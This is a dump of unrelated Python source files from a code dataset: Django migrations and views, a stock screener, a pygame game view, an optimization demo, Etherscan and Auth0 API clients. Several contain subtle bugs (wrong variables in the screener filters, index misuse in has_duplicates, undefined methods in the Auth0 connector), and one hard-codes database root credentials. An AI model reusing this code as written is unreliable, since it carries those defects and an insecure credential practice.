*****\n### =========================================================================================\n\n# renvoie une structure python composée de listes et dictionnaires correspondant au fichier json\ndef json_to_python(file_name):\n with open(file_name, 'r') as f:\n f.seek(0)\n return json.load(f)\n\n### =========================================================================================\n### ***** Convertir des objets non jsonables en objets jsonable et vice versa *****\n### =========================================================================================\n\ndef sets_to_lists_copy(almost_jsonable_structure):\n if type(almost_jsonable_structure).__name__ == 'set':\n jsonable_structure=[]\n for item in almost_jsonable_structure:\n jsonable_structure.append(sets_to_lists_copy(item))\n elif type(almost_jsonable_structure).__name__ == 'dict':\n jsonable_structure = {}\n for item in almost_jsonable_structure:\n jsonable_structure[item]=(sets_to_lists_copy(almost_jsonable_structure[item]))\n else:\n jsonable_structure = almost_jsonable_structure\n return jsonable_structure\n\n\ndef lists_to_sets_copy(json_loaded_structure):\n if type(json_loaded_structure).__name__ == 'list':\n set_structure=set()\n for item in json_loaded_structure:\n if type(item).__name__ in ['list', 'set', 'dict']: # or not in list of immutables, but this should be enough\n set_structure=[]\n for item in json_loaded_structure:\n set_structure.append(lists_to_sets_copy(item))\n break\n else:\n for item in json_loaded_structure:\n set_structure.add(lists_to_sets_copy(item))\n elif type(json_loaded_structure).__name__ == 'dict':\n set_structure = {}\n for item in json_loaded_structure:\n set_structure[item]=(lists_to_sets_copy(json_loaded_structure[item]))\n else:\n set_structure = json_loaded_structure\n return set_structure\n\n","sub_path":"Data Science/Scholar-Affiliation-Recognition-Project/paf-affiliations-machine_learning/JSON_interfacer.py","file_name":"JSON_interfacer.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"363211742","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport e89_push_messaging.mixins\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0008_auto_20150727_1201'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Alert',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=30)),\n ('content', models.CharField(max_length=100)),\n ('timestamp', models.DateTimeField(auto_now=True)),\n ('user_employee', models.ForeignKey(to='accounts.UserEmployee')),\n ],\n bases=(models.Model, e89_push_messaging.mixins.PushMixin),\n ),\n migrations.CreateModel(\n name='AlertToDelete',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('alert_id', models.IntegerField()),\n ('timestamp', models.DateTimeField(auto_now=True)),\n ('user_employee', models.ForeignKey(to='accounts.UserEmployee')),\n ],\n bases=(models.Model, e89_push_messaging.mixins.PushMixin),\n ),\n ]\n","sub_path":"alerts/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"638340965","text":"from helpers import *\nfrom yahoo_finance import Share\nimport pprint\n#this is going to be the biggest and most difficult part of the program\n\ndef screen():\n\tlisted_data = SP_500()\n\tprint ('Input Specifications ')\n\tind_bool = input('Industry filtered (y/n): ')\n\tif ind_bool == 'y' or ind_bool == 'yes':\n\t\tlisted_data = industry_filter(listed_data)\n\n\t#so they can be bools if not used later\n\tpe_max = False\n\tmax_mc = False\n\tmin_mc = False\n\tcp_val = False\n\n\tpe = input('P/E filter (y/n)*: ')\n\tif (pe == 'y'):\n\t\tpe_max = int(input('Maximum P/E ratio:'))\n\n\txmc = input('Market Cap (max) filter (y/n)*: ')\n\tif (xmc == 'y'):\n\t\tmax_mc = int(input('->Maximum Market Cap ratio:'))\n\n\tn_mc = input('Market Cap (min) filter (y/n)*: ')\n\tif (n_mc == 'y'):\n\t\tmin_mc = int(input('->Minimum Market Cap ratio:'))\n\n\tcp_v = input('Current price filter (y/n)*: ')\n\tif (cp_v == 'y'):\n\t\tcp_val = int(input('->Current Price Window (+-$15):'))\n\n\tif (pe_max or max_mc or min_mc or cp_val):\n\t\tlisted_data = load_filters(listed_data, pe_max, max_mc, min_mc, cp_val)\n\t#one function would be best\n\tprint (listed_data)\n\ndef industry_filter(data):\n\tindustries = []\n\tfor company in data:\n\t\tif len(company) == 3 and company[2] not in industries:\n\t\t\tindustries.append(company[2])\n\tindustries.sort()\n\n\tindustry = input('Industry (ls, quit):')\n\n\twhile industry not in industries:\n\t\tif industry == 'ls':\n\t\t\tprint (industries)\n\t\telif industry == 'quit':\n\t\t\treturn data\n\t\telse:\n\t\t\tprint ('Invalid Industry')\n\t\tindustry = input('Industry (ls, quit):')\n\n\tnew_data = []\n\tfor company in data:\n\t\tif len(company) == 3 and company[2] == industry:\n\t\t\tnew_data.append(company)\n\treturn new_data\n\n\t\ndef load_filters(data, pe_max, max_mc, min_mc, cp_val):\n\tnew_data = []\n\tcount = 0\n\tinv_count = 0\n\tprint ('Running data')\n\tfor company in data:\n\t\trun_bool = True\n\t\ttry:\n\t\t\tcount +=1\n\t\t\tstock = Share(company[0]) #pulls ticker\n\t\t\tif pe_max and run_bool:\n\t\t\t\tratio = stock.get_price_earnings_ratio()\n\t\t\t\tif not type(ratio) is str:\n\t\t\t\t\tinv_count += 1\n\t\t\t\t\trun_bool = False\n\t\t\t\telse:\n\t\t\t\t\trun_bool = float(ratio) <= pe_max\n\t\t\tif max_mc and run_bool:\n\t\t\t\tcap = stock.get_market_cap()\n\t\t\t\tif not type(ratio) is str:\n\t\t\t\t\tinv_count += 1\n\t\t\t\t\trun_bool = False\n\t\t\t\telse:\n\t\t\t\t\trun_bool = float(cap) <= max_mc\n\n\t\t\tif min_mc and run_bool:\n\t\t\t\tcap = stock.get_market_cap()\n\t\t\t\tif not type(ratio) is str:\n\t\t\t\t\tinv_count += 1\n\t\t\t\t\trun_bool = False\n\t\t\t\telse:\n\t\t\t\t\trun_bool = float(cap) >= max_mc\n\n\t\t\tif cp_val and run_bool:\n\t\t\t\tc_price = stock.get_price()\n\t\t\t\tif not type(ratio) is str:\n\t\t\t\t\tinv_count += 1\n\t\t\t\t\trun_bool = False\n\t\t\t\telse:\n\t\t\t\t\trun_bool = float(c_price) <= cp_val + 15 and float(c_price) >= cp_val - 15\n\n\t\t\tif run_bool:\n\t\t\t\tnew_data.append(company)\n\t\texcept:\n\t\t\tinv_count += 1;\n\n\n\n\tprint ('Done Loading!')\n\tprint (inv_count, 'of', count, ' companies filtered out due to no/corrupted data')\n\n\treturn new_data","sub_path":"python 3.5/Screen.py","file_name":"Screen.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"396249571","text":"#第八个练习 - 向Books图书表添加图书数据\r\n\r\nimport pymysql\r\ndb = pymysql.connect('localhost', 'root', 'root123', 'studypython',charset='utf8')\r\ncursor = db.cursor()\r\ndata = [(\"零基础学Python\", \"Python\", \"79.80\", \"2018-5-20\"),\r\n (\"Python从入门到精通\", \"Python\", \"69.80\", \"2018-6-18\"),\r\n (\"零基础学PHP\", \"PHP\", \"69.80\", \"2017-5-21\"),\r\n (\"PHP项目开发实战入门\", \"PHP\", \"79.80\", \"2016-5-21\"),\r\n (\"零基础学Java\", \"Java\", \"69.80\", \"2017-5-21\")]\r\ntry:\r\n cursor.executemany('insert into books(name, category, price, publish_time) values(%s,%s,%s,%s)', data)\r\n db.commit()\r\nexcept:\r\n db.rollback()\r\ndb.close()","sub_path":"008.py","file_name":"008.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"638513201","text":"from zipfile import ZipFile\nimport numpy as np\n\n'''load your data here'''\n\nclass DataLoader(object):\n def __init__(self,batch_size):\n self.DIR = '../data/'\n self.batch_size = batch_size\n \n # Returns images and labels corresponding for training and testing. Default mode is train. \n # For retrieving test data pass mode as 'test' in function call.\n def load_data(self, mode = 'train'):\n label_filename = mode + '_labels'\n image_filename = mode + '_images'\n label_zip = '../data/' + label_filename + '.zip'\n image_zip = '../data/' + image_filename + '.zip'\n with ZipFile(label_zip, 'r') as lblzip:\n labels = np.frombuffer(lblzip.read(label_filename), dtype=np.uint8, offset=8)\n with ZipFile(image_zip, 'r') as imgzip:\n images = np.frombuffer(imgzip.read(image_filename), dtype=np.uint8, offset=16).reshape(len(labels), 784)\n images =images - np.mean(images, axis=1)[:, np.newaxis]\n images= images/255.\n images = np.insert(images, 0, 1, 1)\n return images, labels\n\n def create_batches(self, images_t, labels_t):\n p = np.random.permutation(len(images_t))\n images=images_t[p]\n labels=labels_t[p]\n images=np.reshape(images,(images.shape[0]/self.batch_size,self.batch_size,images.shape[1]))\n labels=np.reshape(labels,(labels.shape[0]/self.batch_size,self.batch_size))\n return images,labels\n'''\ndata = DataLoader()\ndata.create_batches()\n'''","sub_path":"Neural_network_python/code/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"257740332","text":"import pygame\nfrom settings import WAVE,SPRAY,COIN, WIN_WIDTH, WIN_HEIGHT, HP_IMAGE, HP_GRAY_IMAGE, BACKGROUND_IMAGE\nfrom color_settings import *\nclock = pygame.time.Clock() \n\nclass GameView:\n def __init__(self):\n self.win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n #self.font = pygame.font.SysFont(\"comicsans\", 30)\n self.font = pygame.font.Font(pygame.font.match_font('arial'), 25)\n self.coin_count = 0\n self.spray_count = 0\n \n def draw_bg(self):\n self.win.blit(BACKGROUND_IMAGE, (0, 0))\n\n def draw_enemies(self, enemies):\n for en in enemies.get():\n self.win.blit(en.image, en.rect)\n # draw health bar\n bar_width = en.rect.w * (en.health / en.max_health)\n max_bar_width = en.rect.w\n bar_height = 5\n pygame.draw.rect(self.win, RED, [en.rect.x, en.rect.y - 10, max_bar_width, bar_height])\n pygame.draw.rect(self.win, GREEN, [en.rect.x, en.rect.y - 10, bar_width, bar_height])\n \n def draw_fire_balls(self, fire_ball):\n for fire in fire_ball.get():\n self.win.blit(fire.image, fire.rect)\n \n def draw_towers(self, towers):\n # draw tower\n for tw in towers:\n if tw :\n self.win.blit(SPRAY[self.spray_count % 3], tw.rect)\n self.spray_count += 1\n self.win.blit(tw.image, tw.rect)\n\n def draw_range(self, selected_tower):\n # draw tower range\n if selected_tower is not None:\n tw = selected_tower\n # create a special surface that is able to render semi-transparent image\n surface = pygame.Surface((WIN_WIDTH, WIN_HEIGHT), pygame.SRCALPHA)\n transparency = 120\n pygame.draw.circle(surface, (128, 128, 128, transparency), tw.rect.center, tw.range)\n self.win.blit(surface, (0, 0))\n\n def draw_menu(self, menu):\n self.win.blit(menu.image, menu.rect)\n for btn in menu.buttons:\n self.win.blit(btn.image, btn.rect)\n\n def draw_plots(self, plots):\n for pt in plots:\n self.win.blit(pt.image, pt.rect)\n\n def draw_money(self, money: int):\n \"\"\" (Q2.1)render the money\"\"\"\n text = self.font.render(f\" : {money}\", True, (255, 255, 255))\n self.win.blit(text, (5, 45))\n self.win.blit(COIN[self.coin_count % 2], (3, 40))\n if (1000-money) % 2 != 0:\n self.coin_count += 1\n self.win.blit(COIN[self.coin_count % 2], (3, 40))\n\n def draw_wave(self, wave: int):\n \"\"\"(Q2.2)render the wave\"\"\"\n text = self.font.render(f\" : {wave}\", True, (255, 255, 255))\n self.win.blit(WAVE, (3, 10))\n self.win.blit(text, (5, 15))\n\n def draw_hp(self, lives):\n # draw_lives\n hp_rect = HP_IMAGE.get_rect()\n for i in range(10):\n self.win.blit(HP_GRAY_IMAGE, (WIN_WIDTH // 2 - hp_rect.w * (2.5 - i % 5), hp_rect.h * (i // 5)))\n for i in range(lives):\n self.win.blit(HP_IMAGE, (WIN_WIDTH // 2 - hp_rect.w * (2.5 - i % 5), hp_rect.h * (i // 5)))\n \n def draw_end(self, model):\n# largeText = pygame.font.SysFont(\"comicsansms\",115)\n# TextSurf = largeText.render('You dead', True, (255,0,0))\n# self.win.blit(TextSurf, (WIN_WIDTH // 3 -50 , WIN_HEIGHT // 3))\n end = True\n pygame.init()\n pygame.font.init()\n while end and model.events[\"game quit\"] == False: \n end = True\n largeText = pygame.font.Font(pygame.font.match_font('arial'), 115)\n #largeText = pygame.font.SysFont(\"comicsansms\",115)\n TextSurf = largeText.render('Game over', True, (255,255,255))\n self.win.blit(TextSurf, (WIN_WIDTH // 3 - 50 , WIN_HEIGHT // 3))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n model.events[\"game quit\"] = True\n end = False\n break\n elif event.type == pygame.KEYDOWN :\n if event.key == pygame.K_r: # Unpausing\n end = False\n break\n pygame.display.update()\n \n def draw_count_down(self,wait):\n #font= pygame.font.SysFont(\"comicsansms\",100)\n font = pygame.font.Font(pygame.font.match_font('arial'), 100)\n count_down_text = font.render(str(wait), True, (255,255,255))\n count_down_rect = count_down_text.get_rect()\n surface = pygame.Surface((WIN_WIDTH, WIN_HEIGHT), pygame.SRCALPHA)\n transparency = 100\n pygame.draw.circle(surface, (128, 128, 128, transparency), (512,300),150)\n self.win.blit(surface, (0, 0))\n count_down_rect.center = (512,300)\n self.win.blit(count_down_text, count_down_rect)\n \n def draw_win(self, model):\n# largeText = pygame.font.SysFont(\"comicsansms\",115)\n# TextSurf = largeText.render('You dead', True, (255,0,0))\n# self.win.blit(TextSurf, (WIN_WIDTH // 3 -50 , WIN_HEIGHT // 3))\n win = True\n pygame.init()\n pygame.font.init()\n while win:\n win = True\n #largeText = pygame.font.SysFont(\"comicsansms\",115)\n largeText = pygame.font.Font(pygame.font.match_font('arial'), 115)\n TextSurf = largeText.render('You win', True, (255,255,255))\n self.win.blit(TextSurf, (WIN_WIDTH // 3 - 50 , WIN_HEIGHT // 3))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n model.events[\"game quit\"] = True\n win = False\n break\n elif event.type == pygame.KEYDOWN :\n if event.key == pygame.K_r: # Unpausing\n win = False\n break\n pygame.display.update()\n","sub_path":"The Last Pure Land_version.03/game/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"528947617","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 6 14:22:56 2014\n\n@author: maire\n\"\"\"\ndef has_duplicates(list): \n for i in list:\n for k in range(i+1,len(list)):\n if list[i]==list[k]:\n return True\n return False \n","sub_path":"SoftwareDesignExplore/Day5.py","file_name":"Day5.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"255986547","text":"from django.conf.urls import url\nfrom .views import home, account\n\n\nurlpatterns = [\n url(r'^login.html', account.login),\n url(r'^logout.html', account.logout),\n url(r'^register.html', account.register),\n url(r'^updown.html', account.updown),\n url(r'^check_code.html$', account.check_code),\n url(r'^receive_content.html$', account.receive_content),\n url(r'^all/(?P\\d+).html$', home.index, name='index'),\n url(r'^(?P\\w+)/(?P((tag)|(category)|(date)))/(?P\\w+-?\\w*).html$', home.allocation), # filter\n url(r'^(?P\\w+)/(?P\\d+).html$', home.detail),\n url(r'^(?P\\w+).html$', home.home),\n url(r'^', home.index),\n]\n","sub_path":"SelfLearn/框架(Django)/181115_報障系統/reportingsystem/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"486256071","text":"#!/usr/bin/env python3\n# http://ikuz.eu/2015/04/15/the-concept-of-conjugate-gradient-descent-in-python/\n\nimport itertools\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef main():\n A = np.matrix([[3.0, 2.0], [2.0, 6.0]])\n b = np.matrix([[2.0], [-8.0]]) # we will use the convention that a vector is a column vector\n c = 0.0\n\n x1, x2, zs = bowl(A, b, c)\n contoursteps(x1, x2, zs)\n\n # steps = steepest_descent(A, b)\n # contoursteps(x1, x2, zs, steps)\n\n # steps = steepest_descent_with_fixed_learning_rate(A, b, alpha=0.12)\n # contoursteps(x1, x2, zs, steps)\n\n steps = conjugate_gradient(A, b)\n contoursteps(x1, x2, zs, steps)\n\ndef fn(x, A, b, c):\n return float(0.5 * x.T * A * x - b.T * x + c)\n\ndef bowl(A, b, c):\n fig = plt.figure(figsize=(10,8))\n qf = fig.gca(projection='3d')\n size = 20\n x1 = list(np.linspace(-6, 6, size))\n x2 = list(np.linspace(-6, 6, size))\n x1, x2 = np.meshgrid(x1, x2)\n zs = np.zeros((size, size))\n for i in range(size):\n for j in range(size):\n x = np.matrix([[x1[i,j]], [x2[i,j]]])\n zs[i,j] = fn(x, A, b, c)\n qf.plot_surface(x1, x2, zs, rstride=1, cstride=1, cmap=cm.coolwarm, linewidth=0)\n\n plt.savefig('./plot/bowl.png',dpi=300,format='png',bbox_inches='tight');\n plt.close(fig)\n\n return x1, x2, zs\n\ndef contoursteps(x1, x2, zs, steps=None):\n fig = plt.figure(figsize=(6,6))\n cp = plt.contour(x1, x2, zs, 10)\n plt.clabel(cp, inline=1, fontsize=10)\n if steps is not None:\n steps = np.matrix(steps)\n plt.plot(steps[:,0], steps[:,1], '-o')\n plt.savefig('./plot/contour.png',dpi=300,format='png',bbox_inches='tight');\n plt.close(fig)\n\ndef steepest_descent_with_fixed_learning_rate(A, b, alpha):# aka gradient descent\n x = np.matrix([[-2.0],[-2.0]])\n steps = [(-2.0, -2.0)]\n i = 0\n imax = 10000\n eps = 0.01\n\n r = b - A * x\n delta = r.T * r\n delta0 = delta\n\n while i < imax and delta > eps**2 * delta0:\n x = x + alpha * r\n steps.append((x[0,0], x[1,0])) # store steps for future drawing\n\n r = b - A * x\n delta = r.T * r\n\n i += 1\n\n return steps\n\ndef steepest_descent(A, b):\n # init\n x = np.matrix([[-2.0],[-2.0]])\n steps = [(-2.0, -2.0)]\n i = 0\n imax = 10\n eps = 0.01\n\n r = b - A * x # residual, ie the direction of steepest descent.\n delta = r.T * r\n delta0 = delta\n\n while i < imax and delta > eps**2 * delta0:\n alpha = float(delta / (r.T * (A * r))) # how far along that direction we need to go?.\n\n x = x + alpha * r\n steps.append((x[0,0], x[1,0])) # store steps for future drawing\n\n r = b - A * x # repeat finding the direction\n delta = r.T * r\n\n i += 1\n\n return steps\n\ndef conjugate_gradient(A, b):\n x = np.matrix([[-2.0],[-2.0]])\n steps = [(-2.0, -2.0)]\n i = 0\n imax = 10\n eps = 0.01\n\n r = b - A * x # r: residual\n d = r # d: conjugate vectors, which we call directions.\n delta = r.T * r\n delta0 = delta\n\n while i < imax and delta > eps**2 * delta0:\n alpha = float(delta / float(d.T * (A * d)))\n\n x = x + alpha * d\n steps.append((x[0, 0], x[1, 0]))\n\n r = b - A * x\n\n deltaold = delta\n delta = r.T * r\n\n # \\beta steered us to the conjugate direction.\n # beta = -float((r.T * A * d) / float(d.T * A * d))\n beta = float(delta / float(deltaold)) # simplified version\n\n d = r + beta * d\n\n i += 1\n\n return steps\n\nif __name__ == '__main__':\n main()\n","sub_path":"optim/script/cg_ilya_kuzovkin.py","file_name":"cg_ilya_kuzovkin.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"443901092","text":"from etherscan.accounts import Account\nfrom etherscan.blocks import Blocks\nfrom etherscan.contracts import Contract\nfrom etherscan.proxies import Proxies\nfrom etherscan.stats import Stats\nfrom etherscan.tokens import Tokens\nfrom etherscan.transactions import Transactions\nimport os\nimport json\n\n# Get API Key\npath = os.getcwd()\nwith open(os.path.join(path, 'api_key.json'), mode='r') as key_file:\n key = json.loads(key_file.read())['key']\n\n# Accounts\n\naddress = '0x742d35Cc6634C0532925a3b844Bc454e4438f44e'\napi = Account(address=address, api_key=key)\n\nbalance = api.get_balance()\ntransaction = api.get_transaction_page(\n page=1, offset=10000, sort='des') # erc20 = True)\ntransactions = api.get_all_transactions(\n offset=10000, sort='asc', internal=False)\nblock = api.get_blocks_mined_page(page=1, offset=1, blocktype='blocks')\nblocks = api.get_all_blocks_mined(offset=10, blocktype='uncles')\n\n# address = ['0xddbd2b932c763ba5b1b7ae3b362eac3e8d40121a',\n# '0xddbd2b932c763ba5b1b7ae3b362eac3e8d40121a']\n#\n#api = Account(address=address, api_key=key)\n#balances = api.get_balance_multiple()\n# print(balances)\n\n# Blocks\n\napi = Blocks(api_key=key)\n\nreward = api.get_block_reward(2165403)\n\n# Contracts\n\naddress = '0xfb6916095ca1df60bb79ce92ce3ea74c37c5d359'\napi = Contract(address=address, api_key=key)\n\nabi = api.get_abi()\nsourcecode = api.get_sourcecode()\n\n# Proxies\n\nnumber = 10453272\nblock_numb = '0x9f8118'\naddress = '0xf75e354c5edc8efed9b59ee9f67a80845ade7d0c'\nTX_HASH = '0xb03d4625fd433ad05f036abdc895a1837a7d838ed39f970db69e7d832e41205d'\nindex = '0x0'\napi = Proxies(api_key=key)\n\nprice = api.gas_price()\nblock = api.get_block_by_number(number)\ntx_count = api.get_block_transaction_count_by_number(block_number=block_numb)\ncode = api.get_code(address)\nblock0 = api.get_most_recent_block()\nvalue = api.get_storage_at(address, 0x0)\ntransaction = api.get_transaction_by_blocknumber_index(block_number=block_numb,\n index=index)\ntransaction = api.get_transaction_by_hash(tx_hash=TX_HASH)\ncount = api.get_transaction_count(address)\nreceipt = api.get_transaction_receipt(TX_HASH)\nuncles = api.get_uncle_by_blocknumber_index(block_number=block_numb,\n index=index)\n\n# Stats\n\napi = Stats(api_key=key)\n\nlast_price = api.get_ether_last_price()\nsupply = api.get_total_ether_supply()\n\n# Tokens\n\naddress = '0xe04f27eb70e025b78871a2ad7eabe85e61212761'\ncontract_address = '0x57d90b64a1a57749b0f932f1a3395792e12e7055'\napi = Tokens(contract_address=contract_address,\n api_key=key)\n\nbalance = api.get_token_balance(address=address)\nsupply = api.get_total_supply()\n\n# Transactions\n\nTX_HASH = '0x15f8e5ea1079d9a0bb04a4c58ae5fe7654b5b2b4463375ff7ffb490aa0032f3a'\napi = Transactions(api_key=key)\n\nstatus = api.get_status(tx_hash=TX_HASH)\nreceipt_status = api.get_tx_receipt_status(tx_hash=TX_HASH)\n","sub_path":"section1/task3/Etherscan.py","file_name":"Etherscan.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"594445032","text":"from selenium import webdriver\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.staticfiles.testing import LiveServerTestCase\nfrom django.utils import timezone\nimport time, datetime\nfrom .base import FunctionalTest, LoginFunctionalTest\nfrom unittest import skip\n\n# Import Models\nfrom challenges.views import Challenge\n\n\nclass ChallengesVisitorTest( LoginFunctionalTest ):\n\n ## Challenge Main\n # Avery posts his new challengeboard site for all his computer science friends to check out.\n\n # Rishab visits the site and sees today's challenge as well as a list past challenges on the Challenges Main page.\n\n def test_can_access_challenges_main_and_select_daily_challenge( self ):\n # add challenges to the test database\n Challenge.objects.create( description=\"This is a challenge.\" )\n Challenge.objects.create( description=\"This is another challenge.\" )\n\n response = self.browser.get( self.get_full_url( \"challenges_main\" ) )\n time.sleep( 2 )\n # On the challenges_main page, the user find the challenge of the day.\n page_text = self.browser.find_element_by_tag_name('body').text\n\n self.assertIn(\"Today\", page_text )\n self.assertIn(\"This is a challenge.\", page_text )\n self.assertIn(\"This is another challenge.\", page_text )\n\n def test_challenges_show_date( self ):\n # add a challenge for today to the database\n today_date = datetime.datetime.today()\n Challenge.objects.create( title=\"First Challenge\", description=\"This is the today challenge.\", date=timezone.make_aware( datetime.datetime.today() ) )\n formatted_date = today_date.strftime( \"%a, %b %d\" )\n\n self.browser.get( self.get_full_url( \"challenges_main\" ) )\n page_text = self.browser.find_element_by_tag_name('body').text\n\n self.assertIn( formatted_date, page_text )\n\n ## Challenges Detail\n\n def test_click_from_challenges_main_goes_challenges_detail( self ):\n # add a challenge\n challenge = Challenge.objects.create( description=\"This is a challenge.\" )\n\n response = self.browser.get( self.get_full_url( \"challenges_main\" ) )\n challenge_link = self.browser.find_element_by_class_name( \"challenge_link\" )\n #self.browser.click( challenge_link )\n challenge_link.click()\n\n self.assertRegex( self.browser.current_url, '/challenges/([0-9]+)/' )\n\n ## Challenges Create\n # Rishab wants to create a new challenge so he visits the create challenge page.\n # Rishab types the information for a new challenge into the form and submits it.\n def test_can_create_challenge( self ):\n time.sleep( 4 )\n self.browser.get( self.get_full_url( \"challenges_create\" ) )\n\n # get input elements\n description_box = self.browser.find_element_by_id( 'description' )\n title_box = self.browser.find_element_by_id( 'title' )\n description_box.send_keys(\"Description of a challenge.\")\n title_box.send_keys(\"Title of a challenge.\\n\")\n time.sleep( 3 )\n\n self.assertEqual( Challenge.objects.count(), 1 )\n\n\n# Rishab types his newfangled challenge into the new challenge form.\n def test_can_create_new_challenge( self ):\n response = self.client.post(\n '/challenges/create',\n data={ 'description' : 'A new challenges for you.' }\n )\n","sub_path":"functional_tests/test_challenges.py","file_name":"test_challenges.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"84203225","text":"import numpy as np\nfrom pyemto.examples.emto_input_generator import *\n\n\nfolder = os.getcwd() # Get current working directory.\nemtopath = folder+\"/bcc_fcc_ssos\" # Folder where the calculations will be performed.\nlatpath = emtopath\n\n# bcc SSOS-1\nprims = np.array([[0.0,2.0,3.0],\n [-0.5,2.5,2.5],\n [-0.5,-0.5,0.5]])\n\nbasis = np.array([[0.0,0.0,0.0],\n [0.6,0.6,0.4],\n [0.4,0.4,0.6],\n [0.2,0.2,0.8],\n [0.8,0.8,0.2]])\n\n#species = ['A1+','A2+','A3+','A4+','A5+']\nspecies_cpa = [\"Co\",\"Cr\",\"Fe\",\"Mn\",\"Ni\"]\n\ninput_creator = EMTO(folder=emtopath)\n\ninput_creator.init_structure(latpath=latpath,\n prims=prims,\n basis=basis,\n latname='ssos_bcc_1')\n\n\ninput_creator.init_bulk(atoms_cpa=species_cpa)\n\nsws_range = np.linspace(2, 3, 6)\n\ninput_creator.write_bmdl_kstr_shape_input()\ninput_creator.write_kgrn_kfcd_swsrange(sws=sws_range)\n\n#input_creator.draw_structure('output')\n","sub_path":"pyemto/examples/generate_bcc_fcc_ssos.py","file_name":"generate_bcc_fcc_ssos.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"210610939","text":"from django.utils.translation import ugettext as _\nfrom django.contrib.contenttypes.models import ContentType\nfrom listable.views import BaseListableView, SELECT\n\nfrom . import models\n\n\nclass StaffList(BaseListableView):\n\n model = models.Staff\n\n fields = (\n \"id\",\n \"name\",\n \"active\",\n \"department__name\",\n \"position__name\",\n \"department__business__name\",\n \"department__business__business_type\",\n \"genericname\",\n )\n\n widgets = {\n \"department__business__name\": SELECT,\n \"department__business__business_type\": SELECT,\n \"position__name\": SELECT,\n \"choices\": SELECT,\n \"active\": SELECT,\n }\n\n search_fields = {\n \"name\": (\"first_name__icontains\", \"last_name__icontains\",),\n \"last_name\": \"last_name__exact\",\n \"genericname\": \"genericname__icontains\",\n \"department__name\": \"department__name__icontains\",\n }\n\n order_fields = {\n \"name\": (\"last_name\", \"first_name\",),\n }\n\n headers = {\n \"position__name\": _(\"Position\"),\n \"department__business__name\": _(\"Business\"),\n \"department__business__business_type\": _(\"Business Type\"),\n }\n\n order_by = (\"-name\",)\n\n select_related = (\"department\", \"position\", \"department__business\",)\n\n def generic(self, obj):\n return obj.generic_object.name\n\n def name(self, staff):\n return staff.name()\n\n def get_extra(self):\n cta = ContentType.objects.get_for_model(models.GenericModelA)\n ctb = ContentType.objects.get_for_model(models.GenericModelB)\n\n extraq = \"\"\"\n CASE\n WHEN content_type_id = {0}\n THEN (SELECT name from staff_genericmodela WHERE object_id = staff_genericmodela.id)\n WHEN content_type_id = {1}\n THEN (SELECT name from staff_genericmodelb WHERE object_id = staff_genericmodelb.id)\n END\n \"\"\".format(cta.pk, ctb.pk)\n\n return {\"select\": {'genericname': extraq}}\n","sub_path":"listable-demo/staff/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"201204059","text":"from accessors.api_restful_accessor import APIConnector\nimport os\nimport json\nimport builtins\n\n\nclass Auth0APIConnector(APIConnector):\n \"\"\"\n Class for connecting to Auth0\n \"\"\"\n\n def __init__(self, auth_token, x_request_id):\n super(Auth0APIConnector, self).__init__('Auth0APIConnector', '', '')\n self._host_url = builtins.environment_config[builtins.study_id][builtins.environment][\n 'auth0_url']\n\n \"\"\"\n returns request response from Auth0\n :param:\n :return: To retrieve token: request.content)['access_token']\n \"\"\"\n def retrieve_access_token(self):\n\n path = '/v2/oauth/token'\n self._data = self.create_payload()\n self._headers = {'Content-type': 'application/json'}\n return self._connect(path)\n\n \"\"\"\n returns request response from Auth0 with email addresses and other metadata for specified role \n :param: site name for roles generation for URL params \n :return: executes REST operation\n \"\"\"\n def retrieve_recipients(self, site):\n auth_token = ((Auth0APIConnector('', '').retrieve_access_token()).json())['access_token']\n\n self._headers = {'authorization': \"Bearer \" + auth_token}\n self._http_verb = 'get'\n path = '/api/v2/users?q=app_metadata.roles.%5C*%3A%20' + site.upper() + '_VARIANT_REPORT_REVIEWER'\n return self._connect(path)\n\n 